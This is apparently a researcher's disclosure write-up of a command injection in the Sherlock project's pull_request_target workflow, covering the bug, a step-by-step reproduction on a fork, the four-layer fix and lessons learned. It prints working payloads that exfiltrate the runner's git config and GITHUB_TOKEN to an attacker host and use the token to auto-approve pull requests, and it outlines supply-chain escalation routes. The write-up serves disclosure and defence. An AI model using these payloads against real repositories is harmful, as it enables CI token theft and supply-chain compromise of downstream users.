

Sherlock is one of those tools anyone who does OSINT has used at least once. You give it a username and it checks whether that identity exists across 400+ social networks and registration platforms. It is straightforward, fast, written in Python, and has a huge community: at the time of writing the official repository sits at around 83,000 stars on GitHub with hundreds of contributors.

To give an idea of the potential blast radius in case of compromise, I collected some public metrics at the time of writing:

- GitHub, via gh api repos/sherlock-project/sherlock: 82,964 stars, 9,677 forks, 1,289 watchers, repository active since 2018.

- PyPI, via pypistats.org: 321,609 downloads of the sherlock-project package in the six tracked months (Nov 2025 to May 2026), with a recent average of ~2,600 downloads per day and a strong growth trend (Dec 2025 ~39k/month to Apr 2026 ~81k/month, +108% in four months).

I had used Sherlock in the past for username reconnaissance during penetration tests. One day I picked it up again and, before running it, did something I often do with tools I use regularly: I opened the source. When a project has this kind of visibility and so many external contributors, the interesting attack surface is often not in the application code itself but in the supply chain: dependencies, CI/CD pipelines, automations that handle PRs and releases. That is exactly where I found the vulnerability described in this article.

What is Sherlock

Sherlock is an open-source tool distributed on PyPI as sherlock-project. Its logic is simple: it reads a data.json file mapping hundreds of sites (URL, response patterns, username format) and checks in parallel whether the given username is registered on each one. It is among the most widely used OSINT tools and a staple of introductory courses on the subject.

The fact that the site database is centralised in a single JSON file creates an interesting surface: every new site the community wants to support goes through a pull request that modifies data.json. To automatically validate these contributions, the maintainers built a CI pipeline that tests newly added or modified sites. That pipeline is where I found the bug.

Starting point: the workflows

When I do code review for this class of vulnerability, the first thing I look at is not src/ or lib/. It is .github/workflows/. I start there because:

- GitHub Actions workflows run with access to repository secrets

- CI pipelines execute automatically in response to externally controlled events (PRs, issues, comments)

- They have been among the most exploited weak points in supply chain attacks over the past two years

The trivy-action incident (Aqua Security’s official container security scanner action) in February 2026 is an almost textbook example: an attacker opened a PR from a fork to the aquasecurity/trivy-action repo, the pull_request_target workflow checked out the PR’s code and executed it in a privileged context, exfiltrating a maintainer’s PAT. From there, the attacker overwrote 75 release tags of the action, injecting code that stole secrets from the CI pipelines of every project using trivy-action. Because Trivy is installed across thousands of organisations, the exposure was massive (CrowdStrike writeup, Socket writeup).

The same dynamic played out with tj-actions/changed-files (CVE-2025-30066) and reviewdog/action-setup (CVE-2025-30154) in March 2025: a chain that started from a vulnerable pull_request_target workflow on a peripheral repository exfiltrated a maintainer’s PAT, then a base64-encoded payload was pushed to all version tags of tj-actions/changed-files (an action used by 23,000+ repositories), injecting a step that dumped runner memory to public Actions logs. The initial target was Coinbase. CISA issued a dedicated alert (CISA advisory).

More recently the same bug class hit timescale/pgai (GHSA-89qq-hgvp-x37m, May 2025) and GoogleCloudPlatform projects analysed by Orca Security.

GitHub itself, in a blog post published in July 2025, stated that workflow injection is “one of the most common vulnerabilities in projects hosted on GitHub” and that, according to Octoverse 2024/2025, injection vulnerabilities rank first among OWASP categories detected by CodeQL across the entire platform. The post explicitly identifies pull_request_target as “substantially more dangerous” than pull_request because it relaxes the permission and secret access restrictions normally applied to PRs from forks.

Knowing this bug class exists and having seen it exploited multiple times in the past two years makes the code review fast: open the workflows folder, look for pull_request_target triggers, and for each one check whether there are ${{ ... }} interpolations of attacker-controlled fields inside run: blocks or env: blocks referenced by run: blocks.
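The triage described above can be roughly automated. What follows is a minimal sketch, not a replacement for dedicated linters: it works on raw text instead of parsing YAML, the list of "untrusted" expressions is my own illustrative assumption, and step outputs are only dangerous when they derive from PR content, so every hit still needs a manual look. The function name find_risky_interpolations and the SAMPLE workflow are hypothetical.

```python
import re

# Expressions an outside contributor can often influence. This list is
# illustrative and incomplete; step outputs are only untrusted when they are
# derived from PR content, so every hit still needs a human look.
UNTRUSTED = re.compile(
    r"\$\{\{\s*(?:github\.event\.(?:pull_request|issue|comment)\.[\w.]+"
    r"|github\.head_ref"
    r"|steps\.[\w-]+\.outputs\.[\w-]+)[^}]*\}\}"
)
RUN_KEY = re.compile(r"^(?P<indent>\s*(?:-\s+)?)run:\s*(?P<body>.*)$")


def find_risky_interpolations(workflow_text: str) -> list[tuple[int, str]]:
    """Return (line number, expression) for untrusted ${{ }} inside run: blocks."""
    if "pull_request_target" not in workflow_text:
        return []
    findings = []
    run_indent = None  # column of the current run: key while inside its block
    for number, line in enumerate(workflow_text.splitlines(), start=1):
        indent = len(line) - len(line.lstrip())
        if run_indent is not None:
            if line.strip() and indent <= run_indent:
                run_indent = None  # dedent: the block scalar is over
            else:
                findings += [(number, m.group(0)) for m in UNTRUSTED.finditer(line)]
                continue
        match = RUN_KEY.match(line)
        if match:
            body = match.group("body")
            if body[:1] in ("|", ">"):
                run_indent = len(match.group("indent"))
            else:  # single-line form: run: some command
                findings += [(number, m.group(0)) for m in UNTRUSTED.finditer(body)]
    return findings


# Hypothetical workflow: one unsafe step and one step using the env: pattern.
SAMPLE = """\
on:
  pull_request_target:
jobs:
  validate:
    runs-on: ubuntu-latest
    steps:
      - name: Unsafe
        run: |
          pytest --chunked-sites "${{ steps.discover-modified.outputs.changed_targets }}"
      - name: Safe
        env:
          CHANGED_TARGETS: ${{ steps.discover-modified.outputs.changed_targets }}
        run: |
          pytest --chunked-sites "$CHANGED_TARGETS"
"""

if __name__ == "__main__":
    for number, expression in find_risky_interpolations(SAMPLE):
        print(f"line {number}: {expression}")
```

Only the interpolation inside the run: block is reported; the same expression inside env: is left alone, because there it is assigned as data and never pasted into the script text.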

Why pull_request_target is dangerous

In GitHub Actions there are two main triggers for pull requests:

- pull_request: the workflow runs in the attacker’s fork context, with minimal permissions and no access to secrets. If the PR contains malicious code, it runs in an isolated sandbox. Safe by default.

- pull_request_target: the workflow runs in the target repository’s context, with full permissions and complete access to secrets. It exists because it serves legitimate use cases (commenting on fork PRs with a bot, automatically applying labels, validating contributions that need access to test secrets).

The problem is that a pull_request_target workflow must never execute attacker-supplied code or interpolate attacker-controlled fields into positions that become shell commands. If it interpolates ${{ github.event.pull_request.title }} (attacker-controlled) inside a run: block (executed by bash), the expression is expanded before the shell parses the command. A PR titled "; curl evil.com/x; # becomes shell code that executes with the target repository’s secrets.
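To make the ordering concrete, here is a small simulation of that expansion. It is a sketch under loud assumptions: render is a toy stand-in for the Actions expression engine (plain text substitution, nothing more), the echo step is hypothetical, and shlex only approximates how a POSIX shell splits a line into commands. Nothing is executed.

```python
import re
import shlex


def render(template: str, context: dict[str, str]) -> str:
    """Toy stand-in for the expression engine: blind text substitution."""
    return re.sub(
        r"\$\{\{\s*([\w.]+)\s*\}\}",
        lambda m: context[m.group(1)],
        template,
    )


def commands(script: str) -> list[list[str]]:
    """Split a one-line script into commands, roughly as a POSIX shell would."""
    lexer = shlex.shlex(script, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    result, current = [], []
    for token in lexer:
        if token == ";":  # command separator: close the current command
            if current:
                result.append(current)
            current = []
        else:
            current.append(token)
    if current:
        result.append(current)
    return result


# Hypothetical run: step that interpolates the PR title.
STEP = 'echo "PR title: ${{ github.event.pull_request.title }}"'

benign = render(STEP, {"github.event.pull_request.title": "Add new site"})
hostile = render(STEP, {"github.event.pull_request.title": '"; curl evil.com/x; #'})

if __name__ == "__main__":
    print(benign, "->", commands(benign))
    print(hostile, "->", commands(hostile))
```

With the benign title the shell sees a single echo command. With the hostile title the substituted text closes the quote early, so the same line now contains a second command that starts with curl, and the trailing # comments out the leftover quote.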

Back to Sherlock.

The finding

The Sherlock repository has the workflow .github/workflows/validate_modified_targets.yml. It triggers on pull_request_target, runs a Python script that reads the keys modified in sherlock_project/resources/data.json, and uses those values in a test command:

    on:
      pull_request_target:

    permissions:
      contents: read
      pull-requests: write

    jobs:
      validate-modified-targets:
        runs-on: ubuntu-latest
        steps:
          - uses: actions/checkout@v4
            with:
              ref: ${{ github.event.pull_request.head.sha }}
          - id: discover-modified
            run: |
              # Python script that produces modified JSON keys
              # output: changed_targets="key1 key2 key3"
          - name: Validate
            run: |
              poetry run pytest -q --tb no -rA -m validate_targets -n 20 \
                --chunked-sites "${{ steps.discover-modified.outputs.changed_targets }}"

The value ${{ steps.discover-modified.outputs.changed_targets }} is a concatenation of the keys from the JSON file in the PR branch. Those keys are fully attacker-controlled: anyone can open a PR that adds any key to data.json. The key ends up, without any escaping, inside a run: block executed by bash.

For anyone who missed the previous section: this is textbook command injection. A key like:

TestSite"; curl https://attacker.com/?secret=$TOKEN; echo "

produces at runtime the command:

poetry run pytest ... --chunked-sites "TestSite"; curl https://attacker.com/?secret=$TOKEN; echo ""

And it runs in the target repository’s context, with pull-requests: write and access to the workflow’s secrets.

The pull_request_target trigger does not require review or merge: the workflow fires automatically when the PR is opened, even from an anonymous account created five minutes earlier. No human interaction required.

Building the PoC: ethical choices

There was an important choice to make here. The most direct way to demonstrate the vulnerability would have been to open a PR on the official Sherlock repository with the malicious payload, wait for the workflow to execute, and collect the result. Three minutes of work.

I did not do that, and for a good reason.

A pull request on a public repository is visible to anyone. The diff stays indexed even after the PR is closed. GitHub Actions workflow logs are accessible via the web UI. If I had opened a PR with a working command injection payload on the official repo, I would have effectively published a functional exploit before the maintainers had a chance to see it. Anyone, while waiting for the fix, could have copied the payload and replicated the attack.

This is, in my view, the difference between doing security research seriously and running tools blindly: thinking about the blast radius of every action before taking it. A public PoC on an active repository is de facto a full disclosure. There is a reason security advisories are private and there is an embargo window: to give the project time to protect itself before the world knows how to exploit it.

I reproduced the vulnerability on my own fork, with a PR from one branch to another within the same fork. Same workflow behaviour, zero impact on the official repository, zero public exposure.

Technically: the first attempt failed

The initial payload was obvious:

TestSite"; curl https://my-oast.fun/exfil?token=$GITHUB_TOKEN; echo "

I opened the PR on my fork, the workflow fired, I received the OAST callback. But the token parameter was empty:

GET /exfil?token= HTTP/2.0

The command had run, the injection worked, but $GITHUB_TOKEN was not there. When I investigated I understood why.

GITHUB_TOKEN is not an environment variable available by default in runner shells. It is a GitHub Actions secret, reachable through the ${{ secrets.GITHUB_TOKEN }} expression (or the equivalent ${{ github.token }}), and it only shows up as a shell variable when a workflow explicitly declares it in a step’s env: block:

    - name: Some step
      env:
        GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
      run: echo $GITHUB_TOKEN

Sherlock’s workflow did not have this declaration. So $GITHUB_TOKEN was genuinely empty when the payload executed. Good practice from the maintainers, though not sufficient as we will see.

The question then became: is the GITHUB_TOKEN truly unreachable, or just hidden somewhere? The answer is the latter, and where it hides is interesting.

The git credential helper

The workflow executed actions/checkout@v4 to download the PR code. When actions/checkout clones a repository, by default (persist-credentials defaults to true) it configures git on the runner so that subsequent git commands (push, pull, fetch) can authenticate. Strictly speaking this is not a credential helper but an http extraheader setting: the token is saved as an HTTP authorisation header directly in the .git/config of the checked-out repository:

    [http "https://github.com/"]
        extraheader = AUTHORIZATION: basic <base64-encoded-token>

The header value is the base64 encoding of x-access-token:ghs_XXXXXXXXX. Base64 is an encoding, not encryption, so the token effectively sits in plain text on disk, in the workflow’s working directory.

The updated payload became:

TestSite"; git config --list | curl -X POST -d @- https://my-oast.fun/gitconfig; echo "



Open the PR. Workflow fires. Seconds later, a POST callback on the OAST with the full git config --list dump, including the header http.https://github.com/.extraheader=AUTHORIZATION: basic eC1hY2Nlc3MtdG9rZW46Z2hzX1hYWFhYWFhYWFhYWA==....

Decoded:

x-access-token:ghs_11ZXXXXXXXXXXXXXXX...

A valid GITHUB_TOKEN. Extracted from a PR opened by an anonymous account, with no human interaction, in under a minute.
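The decoding step is trivial, which is the point. As a minimal sketch, assuming the dump has the same shape as the git config --list output shown above, the header can be located and decoded like this. The function name decode_extraheader is hypothetical, and the sample value is the redacted placeholder from this article, not a real token.

```python
import base64
import re
from typing import Optional

# Matches the line written by actions/checkout, as it appears in `git config --list`.
EXTRAHEADER = re.compile(
    r"^http\.(?P<url>\S+)\.extraheader=AUTHORIZATION: basic (?P<b64>[A-Za-z0-9+/=]+)",
    re.IGNORECASE | re.MULTILINE,
)


def decode_extraheader(git_config_dump: str) -> Optional[tuple[str, str]]:
    """Return (user, token) from the first basic-auth extraheader, or None."""
    match = EXTRAHEADER.search(git_config_dump)
    if match is None:
        return None
    decoded = base64.b64decode(match.group("b64")).decode()
    user, _, token = decoded.partition(":")
    return user, token


# Redacted placeholder copied from the callback shown in this article.
SAMPLE_DUMP = (
    "core.bare=false\n"
    "http.https://github.com/.extraheader=AUTHORIZATION: basic "
    "eC1hY2Nlc3MtdG9rZW46Z2hzX1hYWFhYWFhYWFhYWA==\n"
)

if __name__ == "__main__":
    result = decode_extraheader(SAMPLE_DUMP)
    if result is not None:
        user, token = result
        # Print only the prefix: enough to recognise the token type.
        print(user, token[:4] + "...")
```

The ghs_ prefix identifies the value as a GitHub Actions installation token, which matches what the callback contained.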

The PoC step-by-step

The complete, self-contained and automated PoC is available at github.com/Astaruf/CVE-2026-44590. The repository contains poc.py, a Python script that executes the entire attack chain end-to-end (fork, setting enablement, payload injection, PR opening, OAST polling, token decoding, PR auto-approval via GitHub API) and produces a final verdict of VULNERABILITY CONFIRMED or FIX VERIFIED. It also ships a --vulnerable flag that rolls the fork back to the pre-fix commit to reproduce the original scenario.

For anyone who wants to replicate the attack manually or understand the flow, here is the full walkthrough. All steps were executed on my personal fork of sherlock-project/sherlock, never on the official repository.



Step 1: Fork and setup

Start by forking the repository via the GitHub UI (https://github.com/sherlock-project/sherlock → Fork).



Clone locally:

git clone https://github.com/<YOUR_USERNAME>/sherlock.git sherlock-poc

cd sherlock-poc



Workflows on a fork are disabled by default for security reasons. Enable them by visiting https://github.com/<YOUR_USERNAME>/sherlock/actions and clicking “I understand my workflows, go ahead and enable them”.

Step 2: Malicious branch and payload

In a real attack, the attacker would work on their own fork and open a cross-fork PR against the upstream repository. Here I simulate everything within my own fork to avoid any public exposure.



git checkout -b malicious-pr



Modify sherlock_project/resources/data.json by adding a key crafted to break out of the shell command’s surrounding double quotes. The payload uses git config --list | curl ... to exfiltrate the GITHUB_TOKEN from the git configuration, and includes a sleep 180 to keep the job alive: the GITHUB_TOKEN is revoked as soon as the job finishes, so the sleep keeps it valid long enough to be used:

"TestSite\"; git config --list | curl -X POST -d @- https://<ATTACKER_SERVER>/exfil; sleep 180; echo \"": {

"errorType": "status_code",

"url": "https://example.com/{}",

"urlMain": "https://example.com/",

"username_claimed": "test"

}



Commit and push:

git add sherlock_project/resources/data.json

git commit -m "Add new site: TestSite"

git push origin malicious-pr

Step 3: Opening the PR



Go to https://github.com/<YOUR_USERNAME>/sherlock/compare/master...malicious-pr and create the PR. Important: the base repository must point to your fork, not to sherlock-project/sherlock. In a real attack, the attacker would target sherlock-project/sherlock:master directly.

Step 4: OAST callback

The validate_modified_targets.yml workflow fires automatically, with no human interaction. Seconds later, a POST arrives on the OAST with the full git config --list dump:

POST /exfil HTTP/2.0

Host: <ATTACKER_SERVER>

User-Agent: curl/8.5.0

...http.https://github.com/.extraheader=AUTHORIZATION: basic eC1hY2Nlc3MtdG9rZW46Z2hzX1hYWFhYWFhYWFhYWA==...

Confirmed: arbitrary command execution on the CI runner and GITHUB_TOKEN exfiltration, with no human interaction whatsoever.

Step 5: Using the token to auto-approve the PR

The received GITHUB_TOKEN inherits the permissions defined in the workflow. In validate_modified_targets.yml:

    permissions:
      contents: read
      pull-requests: write



With pull-requests: write the token can review and approve pull requests via the API. I decode the base64 value from the AUTHORIZATION: basic header:

echo "<BASE64_VALUE>" | base64 -d

I get a string in the form x-access-token:ghs_XXXXXXXXX.... While the workflow is still running (the sleep 180 in the payload guarantees the time window), I use the token to approve the PR via the GitHub API:

    curl -X POST \
      -H "Authorization: token <GITHUB_TOKEN>" \
      -H "Accept: application/vnd.github+json" \
      https://api.github.com/repos/<OWNER>/sherlock/pulls/<PR_NUMBER>/reviews \
      -d '{"event":"APPROVE","body":"All checks passed. LGTM!"}'

The response contains "state": "APPROVED". On the PR page the review appears as posted by github-actions[bot] with the message “All checks passed. LGTM!”, indistinguishable from legitimate CI automation.

![PR auto-approved by github-actions[bot]](/it/posts/sherlock-rce-pull-request-target-cve-2026-44590/11.png)

From this point on it depends on the repo’s branch protection rules. In Sherlock, PR #2824 (publicly verifiable) was merged into master with zero human reviews, meaning there is no hard review requirement. An auto-approval can lead to a merge if the maintainer considers it valid.
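From the defender’s side, an approval signed by the Actions bot is a signal worth surfacing. The sketch below is an assumption-laden illustration: it expects the list of review objects returned by the GitHub REST endpoint for pull request reviews (the same path used in the curl call above), already fetched and parsed, and it only relies on the state and user.login fields. The function name bot_approvals and the sample data are hypothetical.

```python
BOT_LOGIN = "github-actions[bot]"


def bot_approvals(reviews: list[dict]) -> list[dict]:
    """Return the reviews where the Actions bot approved the pull request."""
    return [
        review
        for review in reviews
        if review.get("state") == "APPROVED"
        and (review.get("user") or {}).get("login") == BOT_LOGIN
    ]


# Hypothetical, trimmed-down review objects for illustration only.
SAMPLE_REVIEWS = [
    {"id": 1, "state": "COMMENTED", "user": {"login": "some-maintainer"}},
    {"id": 2, "state": "APPROVED", "user": {"login": "github-actions[bot]"},
     "body": "All checks passed. LGTM!"},
]

if __name__ == "__main__":
    for review in bot_approvals(SAMPLE_REVIEWS):
        print(f"review {review['id']} approved by {BOT_LOGIN}: {review.get('body', '')}")
```

If no workflow in the repository is supposed to approve PRs, any hit here deserves a second look before merging.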

Real-world impact: what an attacker could do

What was demonstrated above is the primitive: RCE on the runner, GITHUB_TOKEN exfiltrated, PR auto-approved. But the real value of a vulnerability is not measured by the primitive itself, it is measured by what an attacker can do from there. Here are the realistic attack vectors, in increasing order of severity.

Vector 1: social engineering → merge → supply chain via PyPI

The most likely scenario. The attacker opens an apparently legitimate PR (“Add new site: Telegram Premium” or similar) that includes two things:

- The command injection payload hidden in a data.json key

- An “innocuous” change elsewhere in the code (a new feature, a minor fix)

The vulnerable workflow executes the payload, exfiltrates the GITHUB_TOKEN, auto-approves the PR. The maintainer opens the PR and sees:

- A plausible title

- Approved by github-actions[bot] (looks like a legitimate CI approval)

- All checks green (the attacker can force success with exit 0 in the payload)

- A diff that looks normal at a glance (who looks suspiciously at a JSON string key in data.json?)

The maintainer clicks “Merge”. We know PR #2824 in Sherlock was merged with zero human reviews, so there is no mandatory review rule blocking this path.

Once the code lands on master:

- Sherlock is distributed on PyPI as sherlock-project. With more than 320,000 downloads in six months, it ends up in OSINT labs, CTFs, university courses, and real penetration tests. The next published release distributes the malicious code to everyone running pip install --upgrade sherlock-project.

- Sherlock has 83,000 stars and hundreds of contributors: the blast radius is comparable, proportionally, to that of trivy-action.

Vector 2: pivoting to privileged workflows

Once malicious code is on master, the attacker is no longer limited to the GITHUB_TOKEN of the vulnerable workflow (which only has contents: read and pull-requests: write). They have access to the union of all secrets used by all workflows in the repo.

In Sherlock’s case, the update-site-list.yml workflow triggers on push to master and contains SSH_DEPLOY_KEY and API_TOKEN_GITHUB, secrets for the static site publishing pipeline. An attacker with merged code can modify that workflow (or add a new one) to exfiltrate these much higher-value secrets, and from there compromise the project’s website, deploy account, and any other repositories reachable with those tokens.

Vector 3: persistence

With code on master, the attacker can modify workflows to give themselves permanent access: add SSH keys to the deploy, rewrite already-published release tags, insert a second backdoor in a different file from the original payload (so that removing the malicious PR does not clean up the infection). Post-incident cleanup of a repository compromised at this level is far more expensive than reverting a single malicious PR.

Vector 4: runner abuse without merge

Even without reaching a merge, during the RCE window (a few minutes) the attacker can:

- Poison CI caches (actions/cache): inject corrupted artefacts that will be served to subsequent legitimate workflow runs

- Modify files generated by the workflow before they are committed or posted as a comment (e.g. a validation_summary.md that another step publishes as a review)

- Generate fake comments or reviews on the PR signed by github-actions[bot], exploiting the trust its identity carries

Why this is a “supply chain compromise” and not just “RCE in CI”

The impact is not limited to the GitHub host. It propagates downstream to:

- End users of the sherlock-project PyPI package (potentially hundreds of thousands of laptops running sherlock)

- The project’s infrastructure (website, deploy keys, social accounts)

- Downstream organisations using sherlock in automated pipelines (CTF platforms, security training environments, OSINT tools integrated in larger frameworks)

The scenario is not theoretical. It is exactly what happened with trivy-action (February 2026) and tj-actions/changed-files (CVE-2025-30066, March 2025). The sequence is always the same:

- pull_request_target workflow with untrusted input interpolation

- Exfiltration of a write-scoped token

- Push of malicious code to the repository

- Distribution of the code via release/tag/package manager

- Thousands of downstream systems compromised

One of Sherlock’s maintainers, in the closing comment of the advisory, summarised it in one line: “Thank you for reporting this, you prevented a supply chain attack.” It was not hyperbole, it was exactly the trajectory the attack was on.

Responsible disclosure

I opened a private GitHub Security Advisory on the Sherlock repository on 11 April 2026, attaching the full PoC, payloads, OAST callback screenshots, and a proposed fix.

For nearly three weeks I received no response. This happens: open-source projects maintained by volunteers have their own timelines, and Sherlock is no exception. On 30 April, after waiting a reasonable period, I decided to reach out directly to two of the maintainers on LinkedIn, briefly explaining the situation and asking whether they could look at the open advisory.

A response came within hours. Both maintainers were cordial, genuinely concerned, and took the report on immediately. One of them, busy with other things, escalated to a colleague who pushed the fix the same day. The other confirmed the vulnerability and shipped the fix within 24 hours.

One thing that struck me positively: neither of them ever gave the impression of treating the finding as an embarrassing criticism of their work. They work in cybersecurity, they understand the value of security research, they grasped the impact immediately and thanked me in the advisory comments. They themselves requested a CVE to make the finding publicly trackable. They also handled the packaging details intelligently: the maintainer changed the affected ecosystem in the advisory from “pip” to “Repository CI”, to avoid the vulnerability (which affects the CI pipeline, not the end-user package) triggering spurious alerts on PyPI vulnerability dashboards.

To my surprise, one of the maintainers also found my buymeacoffee link and sent a small financial thank-you. In an open-source project with no budget and no official bug bounty programme, a maintainer reaching into their own pocket to say thank you is the kind of gesture that speaks more eloquently than any comment about how seriously these people take their project. I was genuinely touched.

It was, in its own small way, an example of how responsible disclosure can work well even in an open-source project without a dedicated security team.

Timeline

- 2026-04-11: private GitHub Security Advisory opened on sherlock-project/sherlock

- 2026-04-30: direct contact with two maintainers via LinkedIn

- 2026-05-02: report acknowledged, fix pushed the same day

- 2026-05-07: CVE-2026-44590 assigned

- 2026-05-07: advisory published

The fix

The fix applied by the maintainers does not merely close the single injection point: it layers four defences, each of which removes a different link of the attack chain. It is a very clean example of defence in depth applied to a CI workflow.

1. Trigger restricted via paths: and branches:

    on:
      pull_request_target:
        branches:
          - master
        paths:
          - "sherlock_project/resources/data.json"

The workflow now only fires for PRs targeting master that actually modify data.json. This drastically reduces the surface: any PR that does not touch data.json does not trigger the vulnerable workflow at all. It is a shallow mitigation (the attacker must modify data.json to exploit the bug, which is exactly what the payload does), but it reduces noise and general attack surface.

2. persist-credentials: false on checkout

    - name: Checkout repository
      uses: actions/checkout@v5
      with:
        ref: ${{ github.base_ref }}
        fetch-depth: 0
        persist-credentials: false

This is the most important defence against token exfiltration. Without persist-credentials: false, actions/checkout leaves the GITHUB_TOKEN in .git/config as an HTTP authorisation header (the mechanism I used to extract it in the PoC). With this option, the token is removed from the git configuration as soon as the checkout step finishes, so it is no longer on disk when later steps run. Even if a future change reintroduces an RCE elsewhere in the workflow, the attacker will no longer have git config --list as an exfiltration channel.
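A cheap way to keep this property from regressing is to assert it from inside the job. The following is a minimal sketch of such a guard, assuming the checkout lives in the current directory and that the persisted header has the extraheader form shown earlier; the function name has_persisted_credentials is hypothetical.

```python
import re
from pathlib import Path

# The line actions/checkout leaves behind when credentials are persisted.
PERSISTED_AUTH = re.compile(
    r"^\s*extraheader\s*=\s*AUTHORIZATION:", re.IGNORECASE | re.MULTILINE
)


def has_persisted_credentials(git_config_text: str) -> bool:
    """True if the git config text still carries an authorisation extraheader."""
    return PERSISTED_AUTH.search(git_config_text) is not None


if __name__ == "__main__":
    config_path = Path(".git/config")  # assumption: run from the checkout root
    if config_path.is_file() and has_persisted_credentials(config_path.read_text()):
        raise SystemExit("token found in .git/config: set persist-credentials: false")
    print("no persisted credentials found")
```

Run as an early step after checkout, it fails the job loudly if someone later drops the option from the workflow.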

3. Schema validation step (independent defence in depth)

Between the Discover modified targets step and the one that executed the command injection, the maintainers now run a JSON schema validation on the new targets before passing them to pytest:

    - name: Validate remote manifest against local schema
      if: steps.discover-modified.outputs.changed_targets != ''
      run: |
        poetry run pytest tests/test_manifest.py::test_validate_manifest_against_local_schema

This step had existed in the repo since October 2025, well before the May 2026 command injection fix, and was designed for manifest quality, not for security. It acts as a barrier nonetheless: the advisory’s original payload ("TestSite\"; ...; echo \"") was rejected here due to additionalProperties: false or because of a missing required field in the JSON schema. Reaching the vulnerable step now requires crafting a key that is still malicious in shell syntax yet valid according to the JSON schema, further reducing the feasibility of future payload variants.
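To illustrate why structural validation gets in the way of a payload, here is a dependency-free sketch of that kind of check. It is not Sherlock’s schema: the site-name pattern, the required field set (taken from the example entry in this article) and the strict "no extra fields" rule are all assumptions chosen for illustration, and the function name validate_manifest is hypothetical.

```python
import re

# Hypothetical rules, loosely mirroring patternProperties + required +
# additionalProperties: false in a JSON schema.
SITE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9 ._()!+-]*$")
REQUIRED_FIELDS = {"errorType", "url", "urlMain", "username_claimed"}
ALLOWED_FIELDS = REQUIRED_FIELDS  # strict: nothing beyond the required set


def validate_manifest(manifest: dict) -> list[str]:
    """Return human-readable errors; an empty list means the manifest passed."""
    errors = []
    for name, entry in manifest.items():
        if not SITE_NAME.fullmatch(name):
            errors.append(f"{name!r}: site name contains disallowed characters")
            continue
        fields = set(entry)
        missing = REQUIRED_FIELDS - fields
        extra = fields - ALLOWED_FIELDS
        if missing:
            errors.append(f"{name!r}: missing fields {sorted(missing)}")
        if extra:
            errors.append(f"{name!r}: unexpected fields {sorted(extra)}")
    return errors


ENTRY = {
    "errorType": "status_code",
    "url": "https://example.com/{}",
    "urlMain": "https://example.com/",
    "username_claimed": "test",
}

if __name__ == "__main__":
    hostile_key = 'TestSite"; git config --list | curl -X POST -d @- https://<ATTACKER_SERVER>/exfil; echo "'
    print(validate_manifest({"TestSite": ENTRY}))
    print(validate_manifest({hostile_key: ENTRY}))
```

A check like this is a useful extra layer, but it constrains shape, not intent, so it does not replace keeping untrusted values out of the script text in the first place.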

4. The actual fix: untrusted input passed via env: with quoting

The surgical change that definitively closes the command injection:

Before:

    - name: Validate modified targets
      run: |
        poetry run pytest -q --tb no -rA -m validate_targets -n 20 \
          --chunked-sites "${{ steps.discover-modified.outputs.changed_targets }}"

After:

    - name: Validate modified targets
      env:
        CHANGED_TARGETS: ${{ steps.discover-modified.outputs.changed_targets }}
      run: |
        poetry run pytest -q --tb no -rA -m validate_targets -n 20 \
          --chunked-sites "$CHANGED_TARGETS" \
          --junitxml=validation_results.xml

The technical difference is clear: ${{ ... }} is expanded by GitHub Actions before bash sees the command, so the attacker’s input becomes part of the shell code. With env: the value reaches bash as an environment variable, and "$CHANGED_TARGETS" (quoted) is treated as a single string argument to pytest regardless of its content. Command injection becomes impossible because the payload can never become shell code, it is always data.
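The difference can be reproduced locally with a harmless payload. This is a small sketch, assuming a POSIX sh is available: run_interpolated imitates the vulnerable pattern by pasting the value into the script text, run_via_env imitates the fixed pattern by passing it as an environment variable. Both function names are hypothetical, printf stands in for pytest, and the payload only echoes a marker.

```python
import os
import subprocess

# Harmless stand-in for the malicious key: it only echoes a marker.
PAYLOAD = 'x"; echo INJECTED; echo "'


def run_interpolated(value: str) -> str:
    """Vulnerable pattern: the value is pasted into the script before sh parses it."""
    script = f'printf "%s\\n" "{value}"'
    done = subprocess.run(["sh", "-c", script], capture_output=True, text=True, check=True)
    return done.stdout


def run_via_env(value: str) -> str:
    """Fixed pattern: the script text is constant, the value arrives as data."""
    script = 'printf "%s\\n" "$CHANGED_TARGETS"'
    env = {**os.environ, "CHANGED_TARGETS": value}
    done = subprocess.run(
        ["sh", "-c", script], env=env, capture_output=True, text=True, check=True
    )
    return done.stdout


if __name__ == "__main__":
    print("interpolated:", run_interpolated(PAYLOAD).splitlines())
    print("via env:     ", run_via_env(PAYLOAD).splitlines())
```

In the first case the marker is printed by a command the payload smuggled in. In the second, the whole payload comes back verbatim as a single argument, quotes and semicolons included.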

The combined effect

These four layers act independently:

- The paths: filter reduces the surface

- Schema validation blocks malformed payloads before they even reach the interpolation step

- The env: + quoting pattern makes injection in the pytest step impossible

- persist-credentials: false makes the GITHUB_TOKEN non-extractable even if injection were somehow possible again

To bypass the fix, an attacker would need to break all four simultaneously: find another pull_request_target entry point beyond the paths: filter, write a payload that is syntactically valid according to the JSON schema, find another vulnerable interpolation in a different step beyond the env: pattern, and identify an alternative token exfiltration channel beyond git config --list. That is exactly what a good fix for this category of vulnerability should look like.

Lessons learned

For developers

- pull_request_target triggers exist for legitimate reasons, but they must be treated as high-value attack surfaces. The practical rule: zero interpolation of attacker-controlled fields (PR title, branch name, body, labels, file contents from the PR) inside run: blocks. Always pass values via env: with quoted shell variables.

- If a pull_request_target workflow runs actions/checkout and does not need push credentials, add persist-credentials: false. It costs nothing and eliminates an entire attack vector.

- Workflow permissions must be declared explicitly and reduced to the minimum required. pull-requests: write does not sound like much until you realise it allows auto-approval of malicious PRs.

- Dedicated linters (CodeQL Actions taint tracking, actionlint, zizmor) find these patterns automatically. Integrate them in CI before they become a CVE.

For security researchers

- When auditing a popular project, start with .github/workflows/. It has the highest impact-to-effort ratio in most cases. The application surface of an OSINT tool is interesting, but an RCE in CI/CD is worth ten reflected XSS in the UI.

- Knowing the internals of actions/checkout and where it stores the token is the difference between “I have RCE in CI” and “I have the repository’s GITHUB_TOKEN”. It is worth reading the source code of these actions; they are short and well documented.

- Think about the blast radius before opening a public PR with your PoC. A PR is de facto public disclosure. Reproducing everything on your own fork takes minutes and respects the responsible disclosure window.

- When an advisory sits unanswered for weeks, contacting maintainers directly on LinkedIn or by email is perfectly acceptable. Most maintainers appreciate being informed; it is not trolling or undue pressure. Disclosure is a collaboration.

References

- CVE-2026-44590

- GitHub Security Advisory (GHSA)

- Official Sherlock repository

- GitHub Blog: How to catch GitHub Actions workflow injections before attackers do

- GitHub Security Lab: Preventing pwn requests

